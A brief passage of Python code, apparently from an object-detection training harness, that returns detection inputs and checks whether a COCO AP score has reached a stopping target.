return (inputs, boxes, classes, nboxes)
def reached_target(self):
return (self.params.stop_at_top_1_accuracy and
self.eval_coco_ap >= self.params.stop_at_top_1_accuracy)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.